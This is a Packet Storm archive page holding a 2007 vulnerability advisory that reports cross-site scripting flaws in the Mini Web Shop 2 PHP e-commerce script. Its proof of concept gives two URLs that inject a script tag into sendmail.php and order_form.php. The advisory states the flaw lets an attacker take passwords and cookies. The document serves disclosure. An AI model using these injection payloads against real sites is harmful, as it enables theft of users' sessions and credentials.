exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

miniwebshop2-xss.txt

miniwebshop2-xss.txt
Posted May 8, 2007
Authored by CorryL

Mini Web Shop version 2 suffers from cross site scripting vulnerabilities.

tags | exploit, web, vulnerability, xss
SHA-256 | 9c7fcbdd6d917bb63e85ace22145a7a8102f67df152c7349b967432e894d1477

miniwebshop2-xss.txt

Change Mirror Download
-=[--------------------ADVISORY-------------------]=-

Mini Web Shop V.2

Author: CorryL [corryl80@gmail.com]
-=[-----------------------------------------------]=-


-=[+] Application: Mini Web Shop
-=[+] Version: 2
-=[+] Vendor's URL: http://obiewebsite.sourceforge.net/o.php?Mini_Web_Shop
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Cross-Site Script
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: http://corryl.altervista.org
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck


..::[ Descriprion ]::..

An e-commerce PHP script has an online web shop,
shopping cart (based on cookies),
one-level categories, multi languages supports, voting and searching...
Fully functions admin control panel. Each item has thumbnail photo, voting,
click and qualtity tracker, active or inactive mode, ....
Users can shopping on Web then order via email then purchasing in cash/cheque or Credit Card.
Fully admin control panel with items management, new item adding, news publishing, file editor,
and online configuation tool, you dont have to change your config via FTP.


..::[ Bug ]::..

This software is affection from a bug type cross site script ,
a remote attaker is able to exploit this bug to draw information password,
cookie, etc.

..::[ Proof Of Concept ]::..

http://remote-server/path/modules/sendmail.php/>"><ScRiPt>alert(100438267)</ScRiPt>
http://remote-server/path/modules/order_form.php/>"><ScRiPt>alert(1979336232)</ScRiPt>


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close